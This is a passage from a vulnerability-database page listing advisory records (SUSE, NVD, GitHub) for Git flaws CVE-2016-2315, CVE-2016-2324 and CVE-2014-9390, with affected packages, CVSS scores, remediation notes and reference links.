Tumbleweed:git-cvs-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-email-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-email-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-email-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-email-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-web-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-web-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-web-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-web-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:gitk-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:gitk-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:gitk-2.11.0-1.1.s390x", "openSUSE Tumbleweed:gitk-2.11.0-1.1.x86_64", ], }, ], threats: [ { category: "impact", date: "2024-06-15T00:00:00Z", details: "moderate", }, ], title: "CVE-2016-2315", }, { cve: "CVE-2016-2324", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2016-2324", }, ], notes: [ { category: "general", text: "Integer overflow in Git before 2.7.4 allows remote attackers to execute arbitrary code via a (1) long filename or (2) many nested trees, which triggers a heap-based buffer overflow.", title: "CVE description", }, ], product_status: { recommended: [ "openSUSE Tumbleweed:git-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-core-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-core-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-core-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-core-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-email-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-email-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-email-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-email-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-web-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-web-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-web-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-web-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:gitk-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:gitk-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:gitk-2.11.0-1.1.s390x", "openSUSE Tumbleweed:gitk-2.11.0-1.1.x86_64", ], }, references: [ { category: "external", summary: "CVE-2016-2324", url: "https://www.suse.com/security/cve/CVE-2016-2324", }, { category: "external", summary: "SUSE Bug 971328 for CVE-2016-2324", url: "https://bugzilla.suse.com/971328", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "openSUSE Tumbleweed:git-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-core-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-core-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-core-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-core-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-email-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-email-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-email-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-email-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-web-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-web-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-web-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-web-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:gitk-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:gitk-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:gitk-2.11.0-1.1.s390x", "openSUSE Tumbleweed:gitk-2.11.0-1.1.x86_64", ], }, ], scores: [ { cvss_v3: { baseScore: 9.8, baseSeverity: "CRITICAL", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, products: [ "openSUSE Tumbleweed:git-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-arch-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-core-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-core-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-core-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-core-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-credential-gnome-keyring-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-cvs-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-daemon-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-doc-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-email-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-email-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-email-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-email-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-gui-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-svn-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:git-web-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:git-web-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:git-web-2.11.0-1.1.s390x", "openSUSE Tumbleweed:git-web-2.11.0-1.1.x86_64", "openSUSE Tumbleweed:gitk-2.11.0-1.1.aarch64", "openSUSE Tumbleweed:gitk-2.11.0-1.1.ppc64le", "openSUSE Tumbleweed:gitk-2.11.0-1.1.s390x", "openSUSE Tumbleweed:gitk-2.11.0-1.1.x86_64", ], }, ], threats: [ { category: "impact", date: "2024-06-15T00:00:00Z", details: "moderate", }, ], title: "CVE-2016-2324", }, ], }
fkie_cve-2014-9390
Vulnerability from fkie_nvd
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*", matchCriteriaId: "BDA7AD30-7C02-418F-A62D-9C4C179088DB", versionEndExcluding: "1.8.5.6", vulnerable: true, }, { criteria: "cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*", matchCriteriaId: "639D829A-5F78-49EB-924E-F6495EEB5153", versionEndExcluding: "1.9.5", versionStartIncluding: "1.9.0", vulnerable: true, }, { criteria: "cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*", matchCriteriaId: "9080C10B-548A-45AF-9B62-F80B92EEB4F4", versionEndExcluding: "2.0.5", versionStartIncluding: "2.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*", matchCriteriaId: "853D6A11-7FA6-4A92-87E2-6F7756E1C96A", versionEndExcluding: "2.1.4", versionStartIncluding: "2.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*", matchCriteriaId: "BDEC04F1-09CA-4957-90B6-5D87A68C2C06", versionEndExcluding: "2.2.1", versionStartIncluding: "2.2.0", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:o:apple:mac_os_x:-:*:*:*:*:*:*:*", matchCriteriaId: "4781BF1E-8A4E-4AFF-9540-23D523EE30DD", vulnerable: false, }, { criteria: "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", matchCriteriaId: "A2572D17-1DE6-457B-99CC-64AFD54487EA", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:mercurial:mercurial:*:*:*:*:*:*:*:*", matchCriteriaId: "99B4890E-102C-442D-AB16-4D859A595656", versionEndExcluding: "3.2.3", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:o:apple:mac_os_x:-:*:*:*:*:*:*:*", matchCriteriaId: "4781BF1E-8A4E-4AFF-9540-23D523EE30DD", vulnerable: false, }, { criteria: "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", matchCriteriaId: "A2572D17-1DE6-457B-99CC-64AFD54487EA", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:apple:xcode:*:*:*:*:*:*:*:*", matchCriteriaId: "8DDD1870-453C-4B97-BE7B-9B3D6D4856D4", versionEndIncluding: "6.1.1", vulnerable: true, }, { criteria: "cpe:2.3:a:apple:xcode:6.2:-:*:*:*:*:*:*", matchCriteriaId: "9D061C24-F869-456D-8D26-8B6F63B6C834", vulnerable: true, }, { criteria: "cpe:2.3:a:apple:xcode:6.2:beta_2:*:*:*:*:*:*", matchCriteriaId: "0CD44704-4632-43DC-BC56-F872BCAF3E97", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:eclipse:egit:*:*:*:*:*:*:*:*", matchCriteriaId: "EB77E9A5-6A32-42BE-81C0-7D87A2076688", versionEndExcluding: "08-12-2014", vulnerable: true, }, { criteria: "cpe:2.3:a:eclipse:jgit:*:*:*:*:*:*:*:*", matchCriteriaId: "D5351751-FCFD-429E-8FF4-B8E9954D7248", versionEndExcluding: "3.4.2", vulnerable: true, }, { criteria: "cpe:2.3:a:eclipse:jgit:*:*:*:*:*:*:*:*", matchCriteriaId: "D1B88228-1044-4794-A954-A1CA8954D1BA", versionEndExcluding: "3.5.3", versionStartIncluding: "3.5.0", vulnerable: true, }, { criteria: "cpe:2.3:a:libgit2:libgit2:*:*:*:*:*:*:*:*", matchCriteriaId: "973A3E4A-6E15-4137-9933-4609A9CC805C", versionEndExcluding: "0.21.3", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.", }, { lang: "es", value: "Git versiones anteriores a 1.8.5.6, versiones 1.9.x anteriores a 1.9.5, versiones 2.0.x anteriores a 2.0.5, versiones 2.1.x anteriores a 2.1.4 y versiones 2.2.x anteriores a 2.2.1 en Windows y OS X; Mercurial versiones anteriores a 3.2.3 en Windows y OS X; Apple Xcode versiones anteriores a 6.2 beta 3; mine todas las versiones antes del 08-12-2014; libgit2 todas las versiones hasta 0.21. 2; Egit todas las versiones anteriores al 08-12-2014; y JGit todas las versiones anteriores al 08-12-2014 permiten a los servidores Git remotos ejecutar comandos arbitrarios por medio de un árbol que contiene un archivo .git/config diseñado con (1) un punto de código Unicode ignorable, (2) una representación git~1/config, o (3) mayúsculas y minúsculas que no son manejadas apropiadamente en un sistema de archivos insensible a mayúsculas y minúsculas", }, ], id: "CVE-2014-9390", lastModified: "2024-11-21T02:20:45.663", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "HIGH", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2020-02-12T02:15:10.963", references: [ { source: "cve@mitre.org", tags: [ "Broken Link", ], url: "http://article.gmane.org/gmane.linux.kernel/1853266", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", }, { source: "cve@mitre.org", tags: [ "Release Notes", "Third Party Advisory", ], url: "http://mercurial.selenic.com/wiki/WhatsNew", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://securitytracker.com/id?1031404", }, { source: "cve@mitre.org", tags: [ "Vendor Advisory", ], url: "http://support.apple.com/kb/HT204147", }, { source: "cve@mitre.org", tags: [ "Vendor Advisory", ], url: "https://github.com/blog/1938-git-client-vulnerability-announced", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915", }, { source: "cve@mitre.org", tags: [ "Product", ], url: "https://libgit2.org/security/", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://news.ycombinator.com/item?id=8769667", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Broken Link", ], url: "http://article.gmane.org/gmane.linux.kernel/1853266", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", "Third Party Advisory", ], url: "http://mercurial.selenic.com/wiki/WhatsNew", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://securitytracker.com/id?1031404", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Vendor Advisory", ], url: "http://support.apple.com/kb/HT204147", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Vendor Advisory", ], url: "https://github.com/blog/1938-git-client-vulnerability-announced", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Product", ], url: "https://libgit2.org/security/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://news.ycombinator.com/item?id=8769667", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-20", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
ghsa-6vvc-c2m3-cjf3
Vulnerability from github
9.3 (Critical) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine; libgit2; Egit; and JGit allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.
{ affected: [ { package: { ecosystem: "Maven", name: "org.eclipse.jgit:org.eclipse.jgit", }, ranges: [ { events: [ { introduced: "0", }, { fixed: "3.5.3", }, ], type: "ECOSYSTEM", }, ], }, { package: { ecosystem: "PyPI", name: "mercurial", }, ranges: [ { events: [ { introduced: "0", }, { fixed: "3.2.3", }, ], type: "ECOSYSTEM", }, ], }, ], aliases: [ "CVE-2014-9390", ], database_specific: { cwe_ids: [ "CWE-20", ], github_reviewed: true, github_reviewed_at: "2023-01-26T23:53:52Z", nvd_published_at: "2020-02-12T02:15:00Z", severity: "CRITICAL", }, details: "Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine; libgit2; Egit; and JGit allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.", id: "GHSA-6vvc-c2m3-cjf3", modified: "2024-09-25T19:55:47Z", published: "2022-05-17T19:57:29Z", references: [ { type: "ADVISORY", url: "https://nvd.nist.gov/vuln/detail/CVE-2014-9390", }, { type: "WEB", url: "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915", }, { type: "WEB", url: "https://github.com/blog/1938-git-client-vulnerability-announced", }, { type: "WEB", url: "https://github.com/pypa/advisory-database/tree/main/vulns/mercurial/PYSEC-2020-217.yaml", }, { type: "WEB", url: "https://libgit2.org/security", }, { type: "WEB", url: "https://news.ycombinator.com/item?id=8769667", }, { type: "WEB", url: "https://projects.eclipse.org/projects/technology.jgit/releases/3.5.3", }, { type: "WEB", url: "https://web.archive.org/web/20211204220400/https://securitytracker.com/id?1031404", }, { type: "WEB", url: "http://article.gmane.org/gmane.linux.kernel/1853266", }, { type: "WEB", url: "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", }, { type: "WEB", url: "http://mercurial.selenic.com/wiki/WhatsNew", }, { type: "WEB", url: "http://securitytracker.com/id?1031404", }, { type: "WEB", url: "http://support.apple.com/kb/HT204147", }, ], schema_version: "1.4.0", severity: [ { score: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", type: "CVSS_V3", }, { score: "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N", type: "CVSS_V4", }, ], summary: "JGit Improper Input Validation vulnerability", }
Log in or create an account to share your comment.
This schema specifies the format of a comment related to a security advisory.
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.